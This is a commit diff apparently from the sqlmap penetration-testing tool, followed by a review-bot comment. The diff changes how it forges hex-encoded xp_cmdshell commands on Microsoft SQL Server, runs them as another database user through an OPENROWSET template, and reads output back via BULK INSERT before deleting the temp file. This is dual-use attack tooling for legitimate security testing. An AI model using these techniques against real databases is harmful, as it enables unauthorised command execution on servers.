

Commit 99c5ea5

committed
cleanup for #34
1 parent d08a54e commit 99c5ea5

3 files changed

Lines changed: 15 additions & 12 deletions


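--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -820,15 +820,6 @@ def replacePayload(self, inpStr, payload):
 
 def runAsDBMSUser(self, query):
 if conf.dCred and "Ad Hoc Distributed Queries" not in query:
-for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-for sqlStatement in sqlStatements:
-if query.lower().startswith(sqlStatement):
-sqlType = sqlTitle
-break
-
-if sqlType and "SELECT" not in sqlType:
-query = "SELECT %d;%s" % (randomInt(), query)
-
 query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
 
 return query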

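--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -148,12 +148,18 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
 self.xpCmdshellExecCmd(cmd)
 
 def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
+if conf.dCred:
+self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
+cmd = "%s > \"%s\"" % (cmd, self.tmpFile)
+
 self.__randStr = randomStr(lowercase=True)
 self.__cmd = "0x%s" % hexencode(cmd)
 self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
 self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
-if insertIntoTable:
+
+if insertIntoTable and not conf.dCred:
 self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
+
 self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
 return agent.runAsDBMSUser(self.__forgedCmd)
@@ -178,6 +184,11 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
 output = new_output
 else:
 inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
+
+if conf.dCred:
+inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
+self.delRemoteFile(self.tmpFile)
+
 query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
 
 if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)):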
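Review bot: In xpCmdshellForgeCmd the new `if conf.dCred:` branch redirects output to self.tmpFile whenever direct credentials are set, but the matching BULK INSERT and delRemoteFile in xpCmdshellEvalCmd only run on the insertIntoTable path, so a call with insertIntoTable=None under conf.dCred (if any caller does that — callers are outside the hunk) would leave output in a file that is never read or removed; keying the redirect on the same condition as the suppressed INSERT, `if conf.dCred and insertIntoTable:`, keeps the two methods aligned. The BULK INSERT string in the second hunk interpolates self.tmpFile, which is built from conf.tmpPath, without doubling single quotes, unlike the `query.replace("'", "''")` that agent.runAsDBMSUser applies to its statement, so a configured tmp path containing a quote breaks the statement. A short comment on the conf.dCred branch in xpCmdshellForgeCmd explaining why the INSERT INTO is dropped in favour of a file round-trip (presumably because the statement run through the credentials path must return a rowset — confirm) would help the next reader, and self.tmpFile being set in one method and consumed in another deserves a note at the assignment. xpCmdshellForgeCmd lies entirely within the first hunk; xpCmdshellEvalCmd starts before and continues after the second.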
Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,3 @@
1-
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
2-
# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
1+
SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
2+
# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
3+
# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
